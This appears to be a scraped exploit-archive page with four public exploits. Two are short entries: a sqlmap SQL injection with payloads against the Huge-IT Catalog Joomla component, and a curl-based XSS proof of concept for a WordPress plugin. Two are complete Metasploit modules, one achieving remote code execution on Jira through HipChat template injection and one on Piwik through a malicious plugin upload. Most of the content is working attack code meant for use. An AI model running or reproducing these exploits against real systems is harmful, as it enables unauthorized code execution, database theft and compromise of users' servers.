  16. # Exploit Title Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-catalog/ # Software Link: # Version: 1.0.7 # Tested on: Linux # CVE : CVE-2016-1000125 # Advisory: http://www.vapidlabs.com/advisory.php?v=171 # Exploit: • $ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" • • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • • Type: UNION query • Title: Generic UNION query (random number) - 15 columns • Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink= • --- • [16:48:10] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [16:48:10] [WARNING] HTTP error codes detected during run: • 500 (Internal Server Error) - 6637 times • [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com' • • [*] shutting down at 16:48:10
  17. # Exploit Title: Wordpress Plugin Participants Database < 1.7.5.10 - XSS # Google Dork: inurl:wp-content/plugins/participants-database/ # Date: 01-Sep-17 # Exploit Author: Benjamin Lim # Vendor Homepage: https://xnau.com/ # Software Link: https://wordpress.org/plugins/participants-database/ # Version: 1.7.5.9 # Tested on: Kali Linux 2.0 # CVE : CVE-2017-14126 1. Product & Service Introduction: ================================== Participants Database is a Wordpress plugin for managing a database of participants, members or volunteers. As of now, the plugin has been downloaded 320,000 times and has 10,000+ active installs. 2. Technical Details & Description: =================================== Cross site scripting (XSS) vulnerability in the Wordpress Participants Database plugin 1.7.59 allows attackers to inject arbitrary javascript via the Name parameter. The XSS vulnerability is found on the participant signup form input textfield. The get_field_value_display() function in PDb_FormElement.class.php did not escape HTML special characters, allowing an attacker to input javascript. The XSS code will be executed on 2 pages. 1) The "Thank you for signing up" page immediately after submitting the form. 2) The page which is configured to output the list of participants with the [pdb_list] shortcode. 3. Proof of Concept (PoC): ========================== curl -k -F action=signup -F subsource=participants-database -F shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2 -F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F first_name=<script>alert("1");</script> -F last_name=a -F email=a@a.com -F mailing_list=No -F submit_button=Submit http://localhost/?page_id=1 To trigger manually, browse to the page, input the following in the form and click Sign Up. First Name: <script>alert("1");</script> Last Name: test Email: test@test.com 4. Mitigation ============= Update to version 1.7.5.10 5. Disclosure Timeline ====================== 2017/09/01 Vendor contacted 2017/09/02 Vendor responded 2017/09/03 Update released 2017/09/06 Advisory released to the public 6. Credits & Authors: ===================== Benjamin Lim - [https://limbenjamin.com] -- *Benjamin Lim* E: mail@limbenjamin.com PGP : https://limbenjamin.com/pgp
  18. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'json' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Atlassian HipChat for Jira Plugin Velocity Template Injection", 'Description' => %q{ Atlassian Hipchat is a web service for internal instant messaging. A plugin is available for Jira that allows team collibration at real time. A message can be used to inject Java code into a Velocity template, and gain code exeuction as Jira. Authentication is required to exploit this vulnerability, and you must make sure the account you're using isn't protected by captcha. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with a vulnerable copy of HipChat. When using the check command, if you supply a valid username and password, the module will be able to trigger the bug and check more accurately. If not, it falls back to passive, which can only tell if the target is running on a Jira version that is bundled with a vulnerable copy of Hipchat by default, which is less reliable. This vulnerability was originally discovered internally by Atlassian. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Wood', # PoC 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2015-5603' ], [ 'EDB', '38551' ], [ 'BID', '76698' ], [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ] ], 'Targets' => [ [ 'HipChat for Jira plugin on Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], [ 'HipChat for Jira plugin on Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], [ 'HipChat for Jira plugin on Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] ], 'DefaultOptions' => { 'RPORT' => 8080 }, 'Privileged' => false, 'DisclosureDate' => 'Oct 28 2015', 'DefaultTarget' => 0 )) register_options( [ # Auth is required, but when we use the check command we allow them to be optional. OptString.new('JIRAUSER', [false, 'Jira Username', '']), OptString.new('JIRAPASS', [false, 'Jira Password', '']), OptString.new('TARGETURI', [true, 'The base to Jira', '/']) ], self.class) end # Returns a cookie in a hash, so you can ask for a specific parameter. # # @return [Hash] def get_cookie_as_hash(cookie) Hash[*cookie.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/).flatten] end # Checks the target by actually triggering the bug. # # @return [Array] Exploit::CheckCode::Vulnerable if bug was triggered. # Exploit::CheckCode::Unknown if something failed. # Exploit::CheckCode::Safe for the rest. def do_explicit_check begin cookie = do_login # I don't really care which command to execute, as long as it's a valid one for both platforms. # If the command is valid, it should return {"message"=>"0"}. # If the command is not valid, it should return an empty hash. c = get_exec_code('whoami') res = inject_template(c, cookie) json = res.get_json_document if json['message'] && json['message'] == '0' return Exploit::CheckCode::Vulnerable end rescue Msf::Exploit::Failed => e vprint_error(e.message) return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end # Returns the Jira version # # @return [String] Found Jira version # @return [NilClass] No Jira version found. def get_jira_version version = nil res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa') }) unless res vprint_error('Connection timed out while retrieving the Jira version.') return version end metas = res.get_html_meta_elements version_element = metas.select { |m| m.attributes['name'] && m.attributes['name'].value == 'ajs-version-number' }.first unless version_element vprint_error('Unable to find the Jira version.') return version end version_element.attributes['content'] ? version_element.attributes['content'].value : nil end # Checks the target by looking at things like the Jira version, or whether the Jira web app # exists or not. # # @return [Array] Check code. If the Jira version matches the vulnerable range, it returns # Exploit::CheckCode::Appears. If we can only tell it runs on Jira, we return # Exploit::CheckCode::Detected, because it's possible to have Jira not bundled # with HipChat by default, but installed separately. For other scenarios, we # return Safe. def do_passive_check jira_version = get_jira_version vprint_status("Found Jira version: #{jira_version}") if jira_version && jira_version >= '6.3.5' && jira_version < '6.4.11' return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end # Checks the vulnerability. Username and password are required to be able to accurately verify # the vuln. If supplied, we will try the explicit check (which will trigger the bug, so should # be more reliable). If not, we will try the passive one (less accurately, but better than # nothing). # # @see #do_explicit_check # @see #do_passive_check # # @return [Array] Check code def check checkcode = Exploit::CheckCode::Safe if jira_cred_empty? vprint_status("No username and password supplied, so we can only do a passive check.") checkcode = do_passive_check else checkcode = do_explicit_check end checkcode end # Returns the Jira username set by the user def jira_username datastore['JIRAUSER'] end # Returns the Jira password set by the user def jira_password datastore['JIRAPASS'] end # Reports username and password to the database. # # @param opts [Hash] # @option opts [String] :user # @option opts [String] :password # # @return [void] def report_cred(opts) service_data = { address: rhost, port: rport, service_name: ssl ? 'https' : 'http', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: fullname, post_reference_name: self.refname, private_data: opts[:password], origin_type: :service, private_type: :password, username: opts[:user] }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, last_attempted_at: Time.now }.merge(service_data) create_credential_login(login_data) end # Returns a valid login cookie. # # @return [String] def do_login cookie = '' prerequisites = get_login_prerequisites xsrf = prerequisites['atlassian.xsrf.token'] sid = prerequisites['JSESSIONID'] uri = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }, 'cookie' => "atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}", 'vars_post' => { 'os_username' => jira_username, 'os_password' => jira_password, 'os_captcha' => '' # Not beatable yet } }) unless res fail_with(Failure::Unknown, 'Connection timed out while trying to login') end json = res.get_json_document if json.empty? fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.') end if json['loginSucceeded'] cookie = res.get_cookies elsif !json['loginSucceeded'] && json['captchaFailure'] fail_with(Failure::NoAccess, "#{jira_username} is protected by captcha. Please try a different account.") elsif !json['loginSucceeded'] fail_with(Failure::NoAccess, 'Incorrect username or password') end report_cred( user: jira_username, password: jira_password ) cookie end # Returns login prerequisites # # @return [Hash] def get_login_prerequisites uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa') res = send_request_cgi({ 'uri' => uri }) unless res fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites') end get_cookie_as_hash(res.get_cookies) end # Returns the target platform. # # @param cookie [String] Jira cookie # @return [String] def get_target_platform(cookie) c = get_os_detection_code res = inject_template(c, cookie) json = res.get_json_document json['message'] || '' end # Returns Java code that can be used to inject to the template in order to write a file. # # @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code, # and then execute the new file instead. # # @param fname [String] File to write to. # @param p [String] Payload # @return [String] def get_write_file_code(fname, p) b64 = Rex::Text.encode_base64(p) %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) | end # Returns the Java code that gives us the remote Java home path. # # @return [String] def get_java_path_code get_java_property_code('java.home') end # Returns the OS/platform information. # # @return [String] def get_os_detection_code get_java_property_code('os.name') end # Returns the temp path for Java. # # @return [String] def get_temp_path_code get_java_property_code('java.io.tmpdir') end # Returns a system property for Java. # # @param prop [String] Name of the property to retrieve. # @return [String] def get_java_property_code(prop) %Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() | end # Returns the Java code to execute a jar file. # # @param java_path [String] Java home path # @param war_path [String] The jar file to execute # @return [String] def get_jar_exec_code(java_path, war_path) # A quick way to check platform instead of actually grabbing os.name in Java system properties. if /^\/[[:print:]]+/ === war_path normalized_java_path = Rex::FileUtils.normalize_unix_path(java_path, '/bin/java') cmd_str = %Q|#{normalized_java_path} -jar #{war_path}| else normalized_java_path = Rex::FileUtils.normalize_win_path(java_path, '\\bin\\java.exe') war_path.gsub!(/Program Files/, 'PROGRA~1') cmd_str = %Q|cmd.exe /C #{normalized_java_path} -jar #{war_path}"| end %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd_str}').waitFor() | end # Returns Java code that can be used to inject to the template in order to execute a file. # # @param cmd [String] command to execute # @return [String] def get_exec_code(cmd) %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd}').waitFor() | end # Returns Java code that can be used to inject to the template in order to chmod a file. # # @param fname [String] File to chmod # @return [String] def get_chmod_code(fname) get_exec_code("chmod 777 #{fname}") end # Returns Java code that can be used to inject to the template in order to copy a file. # # @note The purpose of this method is to have a file that is not busy, so we can execute it. # It is meant to be used with #get_write_file_code. # # @param fname [String] The file to copy # @param new_fname [String] The new file # @return [String] def get_dup_file_code(fname, new_fname) if fname =~ /^\/[[:print:]]+/ cp_cmd = "cp #{fname} #{new_fname}" else cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}" end get_exec_code(cp_cmd) end # Returns a boolean indicating whether the module has a username and password. # # @return [TrueClass] There is an empty cred. # @return [FalseClass] No empty cred. def jira_cred_empty? jira_username.blank? || jira_password.blank? end # Injects Java code to the template. # # @param p [String] Code that is being injected. # @param cookie [String] A cookie that contains a valid JSESSIONID # @return [void] def inject_template(p, cookie) login_sid = get_cookie_as_hash(cookie)['JSESSIONID'] uri = normalize_uri(target_uri.path, 'rest', 'hipchat', 'integrations', '1.0', 'message', 'render') uri << '/' res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "JSESSIONID=#{login_sid}", 'ctype' => 'application/json', 'data' => { 'message' => p }.to_json }) if !res # This seems to trigger every time even though we're getting a shell. So let's downplay # this a little bit. At least it's logged to allow the user to debug. elog('Connection timed out in #inject_template') elsif res && /Error report/ === res.body print_error('Failed to inject and execute code:') vprint_line(res.body) elsif res vprint_status("Server response:") vprint_line res.body end res end # Checks if the target os/platform is compatible with the module target or not. # # @return [TrueClass] Compatible # @return [FalseClass] Not compatible def target_platform_compat?(target_platform) target.platform.names.each do |n| if /^java$/i === n || /#{n}/i === target_platform return true end end false end # Returns the normalized file path for payload. # # @return [String] def normalize_payload_fname(tmp_path, fname) # A quick way to check platform insteaf of actually grabbing os.name in Java system properties. if /^\/[[:print:]]+/ === tmp_path Rex::FileUtils.normalize_unix_path(tmp_path, fname) else Rex::FileUtils.normalize_win_path(tmp_path, fname) end end # Returns a temp path from the remote target. # # @param cookie [String] Jira cookie # @return [String] def get_tmp_path(cookie) c = get_temp_path_code res = inject_template(c, cookie) json = res.get_json_document json['message'] || '' end # Returns the Java home path used by Jira. # # @param cookie [String] Jira cookie. # @return [String] def get_java_home_path(cookie) c = get_java_path_code res = inject_template(c, cookie) json = res.get_json_document json['message'] || '' end # Exploits the target in Java platform. # # @return [void] def exploit_as_java(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end jar_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") jar = payload.encoded_jar java_home = get_java_home_path(cookie) register_files_for_cleanup(jar_fname) if java_home.blank? fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') else print_status("Found Java home path: #{java_home}") end print_status("Attempting to write #{jar_fname}") c = get_write_file_code(jar_fname, jar) inject_template(c, cookie) print_status("Executing #{jar_fname}") c = get_jar_exec_code(java_home, jar_fname) inject_template(c, cookie) end # Exploits the target in Windows platform. # # @return [void] def exploit_as_windows(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") exe_fname.gsub!(/Program Files/, 'PROGRA~1') exe_new_fname.gsub!(/Program Files/, 'PROGRA~1') register_files_for_cleanup(exe_fname, exe_new_fname) print_status("Attempting to write #{exe_fname}") c = get_write_file_code(exe_fname, exe) inject_template(c, cookie) print_status("New file will be #{exe_new_fname}") c = get_dup_file_code(exe_fname, exe_new_fname) inject_template(c, cookie) print_status("Executing #{exe_new_fname}") c = get_exec_code(exe_new_fname) inject_template(c, cookie) end # Exploits the target in Linux platform. # # @return [void] def exploit_as_linux(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) register_files_for_cleanup(fname, new_fname) print_status("Attempting to write #{fname}") p = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) c = get_write_file_code(fname, p) inject_template(c, cookie) print_status("chmod +x #{fname}") c = get_exec_code("chmod 777 #{fname}") inject_template(c, cookie) print_status("New file will be #{new_fname}") c = get_dup_file_code(fname, new_fname) inject_template(c, cookie) print_status("Executing #{new_fname}") c = get_exec_code(new_fname) inject_template(c, cookie) end def exploit if jira_cred_empty? fail_with(Failure::BadConfig, 'Jira username and password are required.') end print_status("Attempting to login as #{jira_username}:#{jira_password}") cookie = do_login print_good("Successfully logged in as #{jira_username}") target_platform = get_target_platform(cookie) print_status("Target being detected as: #{target_platform}") unless target_platform_compat?(target_platform) fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') end case target.name when /java$/i exploit_as_java(cookie) when /windows$/i exploit_as_windows(cookie) when /linux$/i exploit_as_linux(cookie) end end def print_status(msg='') super("#{peer} - #{msg}") end def print_good(msg='') super("#{peer} - #{msg}") end def print_error(msg='') super("#{peer} - #{msg}") end end
  19. ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/zip' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info( info, 'Name' => 'Piwik Superuser Plugin Upload', 'Description' => %q{ This module will generate a plugin, pack the payload into it and upload it to a server running Piwik. Superuser Credentials are required to run this module. This module does not work against Piwik 1 as there is no option to upload custom plugins. Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1. }, 'License' => MSF_LICENSE, 'Author' => [ 'FireFart' # Metasploit module ], 'References' => [ [ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ] ], 'DisclosureDate' => 'Feb 05 2017', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Piwik', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The URI path of the Piwik installation', '/']), OptString.new('USERNAME', [true, 'The Piwik username to authenticate with']), OptString.new('PASSWORD', [true, 'The Piwik password to authenticate with']) ], self.class) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def normalized_index normalize_uri(target_uri, 'index.php') end def get_piwik_version(login_cookies) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => login_cookies, 'vars_get' => { 'module' => 'Feedback', 'action' => 'index', 'idSite' => '1', 'period' => 'day', 'date' => 'yesterday' } }) piwik_version_regexes = [ /<title>About Piwik ([\w\.]+) -/, /content-title="About&#x20;Piwik&#x20;([\w\.]+)"/, /<h2 piwik-enriched-headline\s+feature-name="Help"\s+>About Piwik ([\w\.]+)/m ] if res && res.code == 200 for r in piwik_version_regexes match = res.body.match(r) if match return match[1] end end end # check for Piwik version 1 # the logo.svg is only available in version 1 res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'themes', 'default', 'images', 'logo.svg') }) if res && res.code == 200 && res.body =~ /<!DOCTYPE svg/ return "1.x" end nil end def is_superuser?(login_cookies) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => login_cookies, 'vars_get' => { 'module' => 'Installation', 'action' => 'systemCheckPage' } }) if res && res.body =~ /You can't access this resource as it requires a 'superuser' access/ return false elsif res && res.body =~ /id="systemCheckRequired"/ return true else return false end end def generate_plugin(plugin_name) plugin_json = %Q|{ "name": "#{plugin_name}", "description": "#{plugin_name}", "version": "#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}", "theme": false }| plugin_script = %Q|<?php namespace Piwik\\Plugins\\#{plugin_name}; class #{plugin_name} extends \\Piwik\\Plugin { public function install() { #{payload.encoded} } } | zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script) zip.add_file("#{plugin_name}/plugin.json", plugin_json) zip.pack end def exploit print_status('Trying to detect if target is running a supported version of piwik') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index }) if res && res.code == 200 && res.body =~ /<meta name="generator" content="Piwik/ print_good('Detected Piwik installation') else fail_with(Failure::NotFound, 'The target does not appear to be running a supported version of Piwik') end print_status("Authenticating with Piwik using #{username}:#{password}...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'vars_get' => { 'module' => 'Login', 'action' => 'index' } }) login_nonce = nil if res && res.code == 200 match = res.body.match(/name="form_nonce" id="login_form_nonce" value="(\w+)"\/>/) if match login_nonce = match[1] end end fail_with(Failure::UnexpectedReply, 'Can not extract login CSRF token') if login_nonce.nil? cookies = res.get_cookies res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'Login', 'action' => 'index' }, 'vars_post' => { 'form_login' => "#{username}", 'form_password' => "#{password}", 'form_nonce' => "#{login_nonce}" } }) if res && res.redirect? && res.redirection # update cookies cookies = res.get_cookies else # failed login responds with code 200 and renders the login form fail_with(Failure::NoAccess, 'Failed to authenticate with Piwik') end print_good('Authenticated with Piwik') print_status("Checking if user #{username} has superuser access") superuser = is_superuser?(cookies) if superuser print_good("User #{username} has superuser access") else fail_with(Failure::NoAccess, "Looks like user #{username} has no superuser access") end print_status('Trying to get Piwik version') piwik_version = get_piwik_version(cookies) if piwik_version.nil? print_warning('Unable to detect Piwik version. Trying to continue.') else print_good("Detected Piwik version #{piwik_version}") end if piwik_version == '1.x' fail_with(Failure::NoTarget, 'Piwik version 1 is not supported by this module') end # Only versions after 3 have a seperate Marketplace plugin if piwik_version && Gem::Version.new(piwik_version) >= Gem::Version.new('3') marketplace_available = true else marketplace_available = false end if marketplace_available print_status("Checking if Marketplace plugin is active") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'Marketplace', 'action' => 'index' } }) fail_with(Failure::UnexpectedReply, 'Can not check for Marketplace plugin') unless res if res.code == 200 && res.body =~ /The plugin Marketplace is not enabled/ print_status('Marketplace plugin is not enabled, trying to enable it') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'plugins' } }) mp_activate_nonce = nil if res && res.code == 200 match = res.body.match(/<a href=['"]index\.php\?module=CorePluginsAdmin&action=activate&pluginName=Marketplace&nonce=(\w+).*['"]>/) if match mp_activate_nonce = match[1] end end fail_with(Failure::UnexpectedReply, 'Can not extract Marketplace activate CSRF token') unless mp_activate_nonce res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'activate', 'pluginName' => 'Marketplace', 'nonce' => "#{mp_activate_nonce}" } }) if res && res.redirect? print_good('Marketplace plugin enabled') else fail_with(Failure::UnexpectedReply, 'Can not enable Marketplace plugin. Please try to manually enable it.') end else print_good('Seems like the Marketplace plugin is already enabled') end end print_status('Generating plugin') plugin_name = Rex::Text.rand_text_alpha(10) zip = generate_plugin(plugin_name) print_good("Plugin #{plugin_name} generated") print_status('Uploading plugin') # newer Piwik versions have a seperate Marketplace plugin if marketplace_available res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'Marketplace', 'action' => 'overview' } }) else res = send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'marketplace' } }) end upload_nonce = nil if res && res.code == 200 match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m) if match upload_nonce = match[1] end end fail_with(Failure::UnexpectedReply, 'Can not extract upload CSRF token') if upload_nonce.nil? # plugin files to delete after getting our session register_files_for_cleanup("plugins/#{plugin_name}/plugin.json") register_files_for_cleanup("plugins/#{plugin_name}/#{plugin_name}.php") data = Rex::MIME::Message.new data.add_part(zip, 'application/zip', 'binary', "form-data; name=\"pluginZip\"; filename=\"#{plugin_name}.zip\"") res = send_request_cgi( 'method' => 'POST', 'uri' => normalized_index, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'uploadPlugin', 'nonce' => "#{upload_nonce}" } ) activate_nonce = nil if res && res.code == 200 match = res.body.match(/<a.*href="index.php\?module=CorePluginsAdmin&action=activate.+nonce=([^&]+)/) if match activate_nonce = match[1] end end fail_with(Failure::UnexpectedReply, 'Can not extract activate CSRF token') if activate_nonce.nil? print_status('Activating plugin and triggering payload') send_request_cgi({ 'method' => 'GET', 'uri' => normalized_index, 'cookie' => cookies, 'vars_get' => { 'module' => 'CorePluginsAdmin', 'action' => 'activate', 'nonce' => "#{activate_nonce}", 'pluginName' => "#{plugin_name}" } }, 5) end end
×
×
  • جدید...